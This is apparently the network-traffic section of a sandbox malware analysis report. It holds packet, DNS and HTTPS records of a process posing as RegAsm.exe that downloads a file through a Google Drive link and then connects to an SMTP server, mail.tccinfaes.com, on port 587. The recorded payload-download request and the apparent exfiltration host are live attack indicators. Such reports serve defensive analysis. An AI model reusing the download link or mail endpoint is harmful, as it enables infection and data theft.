                                                                    Sep 27, 2021 14:27:48.073717117 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.074357986 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.074403048 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.074434996 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.074533939 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.074579954 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.074599028 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.074856043 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.074904919 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.075067043 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.075186968 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.075345039 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.075391054 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.075424910 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.075496912 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.075615883 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.075649977 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.075813055 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.075925112 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.076066017 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.076081991 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.076100111 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.076225042 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.076244116 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.076260090 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.076421976 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.076451063 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.076646090 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.076797009 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.076937914 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.076956034 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.076976061 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.077089071 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.077114105 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.077326059 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.077356100 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.077528000 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.077986002 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.078147888 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.078180075 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.078203917 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.078313112 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.078331947 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.078346968 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.078460932 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.078494072 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.078514099 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.078619003 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.078636885 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.078651905 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.078774929 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.078845978 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.078882933 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.078962088 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079066992 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.079077959 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079098940 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.079303026 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.079699993 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079705000 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.079740047 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.079747915 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079757929 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079842091 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079857111 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079890013 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079899073 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079937935 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.079957008 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.080095053 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.080116034 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.080225945 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.080239058 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.080255985 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.080405951 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.080436945 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.080486059 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.080514908 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.080554008 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.080662012 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.080692053 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.080828905 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.080852032 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.080871105 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.080986023 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.081002951 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.081018925 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.081176043 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.081192017 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.081206083 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.081346035 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.081360102 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.081372976 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.081392050 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.081541061 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.081562996 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.081581116 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.081670046 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.081687927 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.081702948 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.081913948 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.081935883 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.081952095 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082103014 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.082119942 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082134008 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082273006 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.082287073 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.082308054 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082323074 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082434893 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.082453966 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.082468987 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082593918 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082614899 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.082633018 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082722902 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.082737923 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.082757950 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082931042 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.082947016 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.082962036 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.083125114 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.083158016 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.083178997 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.083290100 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.083348036 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.083378077 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.083395004 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.083576918 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.083632946 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.083658934 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.083750963 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.083802938 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.083831072 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.083983898 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.084017038 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.084024906 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.084311008 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.084620953 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.084732056 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.084762096 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.084769964 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.084779978 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.084786892 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.084850073 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.084908009 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.084922075 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.084938049 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.085099936 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.085109949 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.085131884 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.085262060 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.085278988 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.085294008 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.085423946 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.085448027 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.085469961 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.085596085 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.085613966 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.085647106 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.085793972 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.085824013 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.085980892 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.086002111 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.086018085 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.086158037 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.086205959 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.086229086 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.086304903 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.086374044 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.086380959 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.086400986 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.086529970 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.086554050 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.086582899 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.086606979 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.086666107 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.086716890 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:29:23.906142950 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:23.955312967 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:23.955503941 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.168488026 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.168943882 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.218462944 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.218764067 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.270509005 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.273257971 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.331753016 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.331814051 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.331861973 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.331898928 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.332004070 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.332051992 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.334561110 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.336828947 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.386439085 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.428163052 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.530848980 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.580297947 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.581662893 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.631176949 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.631814003 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.721235991 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.729388952 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.729914904 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.779839039 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.780261040 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.840363979 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.840739965 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.890048981 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.919848919 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.919869900 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.920037031 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.920049906 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:29:24.969171047 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.969219923 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.969252110 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:24.969281912 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:25.016222954 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:29:25.068703890 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:31:03.734673977 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:31:03.786339998 CEST58749795188.93.227.195192.168.11.20
                                                                    Sep 27, 2021 14:31:03.786801100 CEST49795587192.168.11.20188.93.227.195
                                                                    Sep 27, 2021 14:31:03.787214994 CEST49795587192.168.11.20188.93.227.195

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 27, 2021 14:26:56.150543928 CEST5345253192.168.11.201.1.1.1
                                                                    Sep 27, 2021 14:26:56.160590887 CEST53534521.1.1.1192.168.11.20
                                                                    Sep 27, 2021 14:26:56.327070951 CEST5474553192.168.11.201.1.1.1
                                                                    Sep 27, 2021 14:26:56.335184097 CEST53547451.1.1.1192.168.11.20
                                                                    Sep 27, 2021 14:27:18.321825027 CEST5432753192.168.11.201.1.1.1
                                                                    Sep 27, 2021 14:27:18.331463099 CEST53543271.1.1.1192.168.11.20
                                                                    Sep 27, 2021 14:27:18.608963966 CEST5299153192.168.11.201.1.1.1
                                                                    Sep 27, 2021 14:27:18.618124008 CEST53529911.1.1.1192.168.11.20
                                                                    Sep 27, 2021 14:27:46.625781059 CEST6536153192.168.11.201.1.1.1
                                                                    Sep 27, 2021 14:27:46.634490013 CEST53653611.1.1.1192.168.11.20
                                                                    Sep 27, 2021 14:27:47.742479086 CEST5381753192.168.11.201.1.1.1
                                                                    Sep 27, 2021 14:27:47.776000977 CEST53538171.1.1.1192.168.11.20
                                                                    Sep 27, 2021 14:29:23.700325966 CEST6163253192.168.11.201.1.1.1
                                                                    Sep 27, 2021 14:29:23.846502066 CEST53616321.1.1.1192.168.11.20
                                                                    Sep 27, 2021 14:30:34.089539051 CEST6435953192.168.11.201.1.1.1
                                                                    Sep 27, 2021 14:30:34.098546028 CEST53643591.1.1.1192.168.11.20

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Sep 27, 2021 14:27:46.625781059 CEST192.168.11.201.1.1.10x9019Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                    Sep 27, 2021 14:27:47.742479086 CEST192.168.11.201.1.1.10xc98dStandard query (0)doc-0c-50-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                    Sep 27, 2021 14:29:23.700325966 CEST192.168.11.201.1.1.10x6d52Standard query (0)mail.tccinfaes.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Sep 27, 2021 14:27:46.634490013 CEST1.1.1.1192.168.11.200x9019No error (0)drive.google.com142.250.185.238A (IP address)IN (0x0001)
                                                                    Sep 27, 2021 14:27:47.776000977 CEST1.1.1.1192.168.11.200xc98dNo error (0)doc-0c-50-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                    Sep 27, 2021 14:27:47.776000977 CEST1.1.1.1192.168.11.200xc98dNo error (0)googlehosted.l.googleusercontent.com172.217.18.97A (IP address)IN (0x0001)
                                                                    Sep 27, 2021 14:29:23.846502066 CEST1.1.1.1192.168.11.200x6d52No error (0)mail.tccinfaes.comtccinfaes.comCNAME (Canonical name)IN (0x0001)
                                                                    Sep 27, 2021 14:29:23.846502066 CEST1.1.1.1192.168.11.200x6d52No error (0)tccinfaes.com188.93.227.195A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • drive.google.com
                                                                    • doc-0c-50-docs.googleusercontent.com

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.11.2049793142.250.185.238443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2021-09-27 12:27:46 UTC0OUTGET /uc?export=download&id=1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    2021-09-27 12:27:47 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Mon, 27 Sep 2021 12:27:47 GMT
                                                                    Location: https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9fjtv4086ilnjilp52k3eek3iqkbfarb/1632745650000/00519186742208262786/*/1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4?e=download
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Content-Security-Policy: script-src 'nonce-iY9ttIwM4ZNa1ocsquIvtg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-XSS-Protection: 1; mode=block
                                                                    Server: GSE
                                                                    Set-Cookie: NID=511=VPwXLDODbRAb45b96JDEETdhDyRlF5cOhhJazCC7L-LNYC3Li-mT5HriiBz8tloW7jJ3M-JH6MtpQNEKzUvvDeJRVs3bzaHwSi2wkdO4Wokc1OqWyw9Cqw6zjPdwV6GtdVPKCL1g3QlpjHYtT9LJK8uoIP_8Ni776JkBaCRGsu4; expires=Tue, 29-Mar-2022 12:27:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                    Accept-Ranges: none
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    2021-09-27 12:27:47 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 39 66 6a 74
                                                                    Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9fjt
                                                                    2021-09-27 12:27:47 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.11.2049794172.217.18.97443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2021-09-27 12:27:47 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9fjtv4086ilnjilp52k3eek3iqkbfarb/1632745650000/00519186742208262786/*/1ush64eeGGoMv4pcIA9UNmkEac9u-lIf4?e=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                    Cache-Control: no-cache
                                                                    Host: doc-0c-50-docs.googleusercontent.com
                                                                    Connection: Keep-Alive
                                                                    2021-09-27 12:27:48 UTC2INHTTP/1.1 200 OK
                                                                    X-GUploader-UploadID: ADPycdv27MhpsFKSKW6jtoGjM6wegHNKVb82oklhTTY5JFe_6loqakFdthKR3gUNXEuhI3AosPuQf6VGgw4sr6k6b8opy_I2aQ
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Credentials: false
